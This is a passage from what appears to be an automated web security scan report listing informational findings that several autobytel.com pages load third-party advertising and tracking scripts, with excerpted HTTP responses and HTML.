http://www.bkrtx.com/js/bk-static.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:25:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:25:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:25:39 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:25:39 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 42750

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
67972-B019-F977-06DCEC36CE17C543|||13148|||;sz=728x90;ptile=1;!cat=;ord=92160000?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47767972-B019-F977-06DCEC36CE17C543|||13148|||;sz=728x90;ptile=1;!cat=;ord=92160000?"></SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47767972-B019-F977-06DCEC36CE17C543|||13148|||;sz=1x3;!cat=;ord=92160000?"></script>
...[SNIP]...
972-B019-F977-06DCEC36CE17C543|||13148|||;sz=160x600;ptile=2;!cat=;ord=92160000?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47767972-B019-F977-06DCEC36CE17C543|||13148|||;sz=160x600;ptile=2;!cat=;ord=92160000?">
       </SCRIPT>
...[SNIP]...
</iframe>

       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...



       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no"></SCRIPT>
...[SNIP]...

21.538. http://www.autobytel.com/content/research/article/index.cfm/filters/Auto%20Show previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/article/index.cfm/filters/Auto%20Show

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47714C37-A036-3E06-18505C0D4B3DC2BC|||13148|||;sz=728x90;ptile=1;!cat=;ord=58503224?
http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47714C37-A036-3E06-18505C0D4B3DC2BC|||13148|||;sz=160x600;ptile=2;!cat=;ord=58503224?
http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47714C37-A036-3E06-18505C0D4B3DC2BC|||13148|||;sz=1x3;!cat=;ord=58503224?
http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
http://www.bkrtx.com/js/bk-static.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:25:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:25:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:25:07 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:25:07 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 53059

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
14C37-A036-3E06-18505C0D4B3DC2BC|||13148|||;sz=728x90;ptile=1;!cat=;ord=58503224?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47714C37-A036-3E06-18505C0D4B3DC2BC|||13148|||;sz=728x90;ptile=1;!cat=;ord=58503224?"></SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47714C37-A036-3E06-18505C0D4B3DC2BC|||13148|||;sz=1x3;!cat=;ord=58503224?"></script>
...[SNIP]...
C37-A036-3E06-18505C0D4B3DC2BC|||13148|||;sz=160x600;ptile=2;!cat=;ord=58503224?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47714C37-A036-3E06-18505C0D4B3DC2BC|||13148|||;sz=160x600;ptile=2;!cat=;ord=58503224?">
       </SCRIPT>
...[SNIP]...
</iframe>

       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...



       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no"></SCRIPT>
...[SNIP]...

21.539. http://www.autobytel.com/content/research/article/index.cfm/filters/Buying%20Guide previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/article/index.cfm/filters/Buying%20Guide

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47709226-B851-F42B-C553A94C8BC31FA2|||13148|||;sz=728x90;ptile=1;!cat=;ord=72325266?
http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47709226-B851-F42B-C553A94C8BC31FA2|||13148|||;sz=160x600;ptile=2;!cat=;ord=72325266?
http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47709226-B851-F42B-C553A94C8BC31FA2|||13148|||;sz=1x3;!cat=;ord=72325266?
http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
http://www.bkrtx.com/js/bk-static.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:25:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:25:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:25:02 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:25:02 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 45588

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
09226-B851-F42B-C553A94C8BC31FA2|||13148|||;sz=728x90;ptile=1;!cat=;ord=72325266?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47709226-B851-F42B-C553A94C8BC31FA2|||13148|||;sz=728x90;ptile=1;!cat=;ord=72325266?"></SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47709226-B851-F42B-C553A94C8BC31FA2|||13148|||;sz=1x3;!cat=;ord=72325266?"></script>
...[SNIP]...
226-B851-F42B-C553A94C8BC31FA2|||13148|||;sz=160x600;ptile=2;!cat=;ord=72325266?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47709226-B851-F42B-C553A94C8BC31FA2|||13148|||;sz=160x600;ptile=2;!cat=;ord=72325266?">
       </SCRIPT>
...[SNIP]...
</iframe>

       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...



       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no"></SCRIPT>
...[SNIP]...

21.540. http://www.autobytel.com/content/research/comparison/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/comparison/index.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||476B4EE8-A84F-E014-C6E7898E452EB837|||13148|||;sz=728x90;ptile=1;!cat=;ord=71612973?
http://ad.doubleclick.net/adj/abtl.research/Crossover/Wagons;abr=!ie;kw=;info=13148;u=|||476B4EE8-A84F-E014-C6E7898E452EB837|||13148|||;sz=160x600;ptile=3;!cat=;ord=71612973?
http://ad.doubleclick.net/adj/abtl.research/Crossover/Wagons;kw=;info=13148;u=|||476B4EE8-A84F-E014-C6E7898E452EB837|||13148|||;sz=1x3;!cat=;ord=71612973?
http://ad.doubleclick.net/adj/abtl.research/all;abr=!ie;kw=;u=|||476B4EE8-A84F-E014-C6E7898E452EB837|||13148|||;sz=300x250;ptile=2;!cat=;ord=71612973?
http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
http://www.bkrtx.com/js/bk-static.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:24:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:24:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:24:27 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:24:27 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 414136

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
B4EE8-A84F-E014-C6E7898E452EB837|||13148|||;sz=728x90;ptile=1;!cat=;ord=71612973?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||476B4EE8-A84F-E014-C6E7898E452EB837|||13148|||;sz=728x90;ptile=1;!cat=;ord=71612973?"></SCRIPT>
...[SNIP]...
8-A84F-E014-C6E7898E452EB837|||13148|||;sz=300x250;ptile=2;!cat=;ord=71612973?" name="frame1" width="300" height="250" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
               <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/all;abr=!ie;kw=;u=|||476B4EE8-A84F-E014-C6E7898E452EB837|||13148|||;sz=300x250;ptile=2;!cat=;ord=71612973?">
               </SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/Crossover/Wagons;kw=;info=13148;u=|||476B4EE8-A84F-E014-C6E7898E452EB837|||13148|||;sz=1x3;!cat=;ord=71612973?"></script>
...[SNIP]...
EE8-A84F-E014-C6E7898E452EB837|||13148|||;sz=160x600;ptile=3;!cat=;ord=71612973?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/Crossover/Wagons;abr=!ie;kw=;info=13148;u=|||476B4EE8-A84F-E014-C6E7898E452EB837|||13148|||;sz=160x600;ptile=3;!cat=;ord=71612973?">
       </SCRIPT>
...[SNIP]...
</iframe>

       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...



       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no"></SCRIPT>
...[SNIP]...

21.541. http://www.autobytel.com/content/research/kbb/index.cfm/action/selectyear/valuetype/TI previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/kbb/index.cfm/action/selectyear/valuetype/TI

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||476B8AE9-AB43-0981-3285AB9974B79EFC|||13148|||;sz=728x90;ptile=1;!cat=;ord=94420380?
http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||476B8AE9-AB43-0981-3285AB9974B79EFC|||13148|||;sz=160x600;ptile=3;!cat=;ord=94420380?
http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;u=|||476B8AE9-AB43-0981-3285AB9974B79EFC|||13148|||;sz=300x250;ptile=2;!cat=;ord=94420380?
http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||476B8AE9-AB43-0981-3285AB9974B79EFC|||13148|||;sz=1x3;!cat=;ord=94420380?
http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
http://www.bkrtx.com/js/bk-static.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:24:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:24:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:24:28 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:24:28 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 37489

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
B8AE9-AB43-0981-3285AB9974B79EFC|||13148|||;sz=728x90;ptile=1;!cat=;ord=94420380?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||476B8AE9-AB43-0981-3285AB9974B79EFC|||13148|||;sz=728x90;ptile=1;!cat=;ord=94420380?"></SCRIPT>
...[SNIP]...
9-AB43-0981-3285AB9974B79EFC|||13148|||;sz=300x250;ptile=2;!cat=;ord=94420380?" name="frame1" width="300" height="250" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
               <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;u=|||476B8AE9-AB43-0981-3285AB9974B79EFC|||13148|||;sz=300x250;ptile=2;!cat=;ord=94420380?">
               </SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||476B8AE9-AB43-0981-3285AB9974B79EFC|||13148|||;sz=1x3;!cat=;ord=94420380?"></script>
...[SNIP]...
AE9-AB43-0981-3285AB9974B79EFC|||13148|||;sz=160x600;ptile=3;!cat=;ord=94420380?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||476B8AE9-AB43-0981-3285AB9974B79EFC|||13148|||;sz=160x600;ptile=3;!cat=;ord=94420380?">
       </SCRIPT>
...[SNIP]...
</iframe>

       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...



       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no"></SCRIPT>
...[SNIP]...

21.542. http://www.autobytel.com/content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/abtl.research/Toyota_Highlander;abr=!ie;kw=Toyota_Highlander;info=13148;dcopt=ist;u=|||476D64C0-EE00-BBDB-657AF33F53FAD5AE|||13148|||;sz=728x90;ptile=1;!cat=Toyota;ord=10294908?
http://ad.doubleclick.net/adj/abtl.research/Toyota_Highlander;abr=!ie;kw=Toyota_Highlander;info=13148;u=|||476D64C0-EE00-BBDB-657AF33F53FAD5AE|||13148|||;sz=160x600;ptile=2;!cat=Toyota;ord=10294908?
http://ad.doubleclick.net/adj/abtl.research/Toyota_Highlander;kw=Toyota_Highlander;info=13148;u=|||476D64C0-EE00-BBDB-657AF33F53FAD5AE|||13148|||;sz=1x3;!cat=Toyota;ord=10294908?
http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=toyota&cmodel=highlander&new=yes&type=&ins=no
http://www.bkrtx.com/js/bk-static.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:24:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:24:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:24:40 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:24:40 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 34688

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
EE00-BBDB-657AF33F53FAD5AE|||13148|||;sz=728x90;ptile=1;!cat=Toyota;ord=10294908?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/Toyota_Highlander;abr=!ie;kw=Toyota_Highlander;info=13148;dcopt=ist;u=|||476D64C0-EE00-BBDB-657AF33F53FAD5AE|||13148|||;sz=728x90;ptile=1;!cat=Toyota;ord=10294908?"></SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/Toyota_Highlander;kw=Toyota_Highlander;info=13148;u=|||476D64C0-EE00-BBDB-657AF33F53FAD5AE|||13148|||;sz=1x3;!cat=Toyota;ord=10294908?"></script>
...[SNIP]...
00-BBDB-657AF33F53FAD5AE|||13148|||;sz=160x600;ptile=2;!cat=Toyota;ord=10294908?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/Toyota_Highlander;abr=!ie;kw=Toyota_Highlander;info=13148;u=|||476D64C0-EE00-BBDB-657AF33F53FAD5AE|||13148|||;sz=160x600;ptile=2;!cat=Toyota;ord=10294908?">
       </SCRIPT>
...[SNIP]...
</iframe>

       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...



       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=toyota&cmodel=highlander&new=yes&type=&ins=no"></SCRIPT>
...[SNIP]...

21.543. http://www.autobytel.com/coupons/my-garage.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/coupons/my-garage.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
http://www.bkrtx.com/js/bk-static.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:48:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:48:52 GMT
Content-Length: 22109
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:48:52 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
</iframe>

       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...



       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no"></SCRIPT>
...[SNIP]...

21.544. http://www.autobytel.com/diagnose-problem/my-garage.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/diagnose-problem/my-garage.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
http://www.bkrtx.com/js/bk-static.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:48:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:48:26 GMT
Content-Length: 22153
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:48:26 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
</iframe>

       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...



       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no"></SCRIPT>
...[SNIP]...

21.545. http://www.autobytel.com/my-garage.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/my-garage.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
http://www.bkrtx.com/js/bk-static.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:48:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:48:06 GMT
Content-Length: 22031
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:48:05 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
</iframe>

       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...



       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no"></SCRIPT>
...[SNIP]...

21.546. http://www.autobytel.com/new-car-price-quotes.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/new-car-price-quotes.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||481E668C-9F93-BF8A-30A0569CC14F30D7|||13148|||;sz=728x90;ptile=1;!cat=;ord=54427565?
http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||481E668C-9F93-BF8A-30A0569CC14F30D7|||13148|||;sz=160x600;ptile=2;!cat=;ord=54427565?
http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
http://www.bkrtx.com/js/bk-static.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:44:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:44:00 GMT
Connection: close
Connection: Transfer-Encoding
